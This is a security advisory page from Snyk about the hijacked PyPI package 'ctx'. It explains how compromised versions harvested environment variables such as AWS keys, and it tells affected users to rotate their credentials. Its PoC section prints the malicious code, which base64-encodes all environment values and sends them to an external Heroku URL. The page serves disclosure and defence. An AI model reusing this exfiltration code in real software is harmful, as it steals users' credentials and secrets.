Homepage

Malicious Package Affecting ctx package, versions [0.1.2,]

Severity

 Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Mature

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-PYTHON-CTX-2847242
  • published24 May 2022
  • disclosed24 May 2022
  • creditjimtk
Report a new vulnerability Found a mistake?

Introduced: 24 May 2022

Malicious CVE NOT AVAILABLE CWE-506  (opens in a new tab)

How to fix?

Avoid using all malicious instances of the ctx package.

Overview

ctx is a malicious package. Versions 0.2.2 and 0.2.6 were released with malicious code that sends AWS tokens to a URL, version 0.1.2 was also republished to Pypi with the malicious code included. In addition all other versions of the library were removed from Pypi. Pypi have since removed all versions of this library from the registry.

The ctx hosted project on PyPI was taken over via user account compromise and replaced with a malicious project which contained runtime code which collected the content of os.environ.items() when instantiating Ctx objects. The captured environment variables were sent as a base64 encoded query parameter to a heroku application running at https://anti-theft-web.herokuapp.com.

If you installed this package between 2022-05-14T19:18:36Z and 2022-05-24T10:07:17Z and your environment variables contain sensitive data like passwords and API keys (like AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY), we advise you rotate your passwords and keys, then perform an audit to determine if they were exploited.

Update

As of May 25th a security researcher has claimed responsibility for this attack as a "demonstration" of how it is possible to takeover packages in package managers. They claim that all user data collected was deleted and no use was made of the data collected by the attack.

The active collection of this type of sensitive user data for "demonstration" purposes is still problematic, and not an act Snyk would normally associate as part of a responsible disclosure process.

PoC

 def __init__(self):
        self.sendRequest()
    .
    .  # code that performs dict access
    .  # please DO NOT RUN THIS CODE !

     def sendRequest(self):
        string = ""
        for _, value in environ.items():
            string += value+" "

        message_bytes = string.encode('ascii')
        base64_bytes = base64.b64encode(message_bytes)
        base64_message = base64_bytes.decode('ascii')

        response = requests.get("https://anti-theft-web.herokuapp.com/hacked/"+base64_message)

CVSS Scores

version 3.1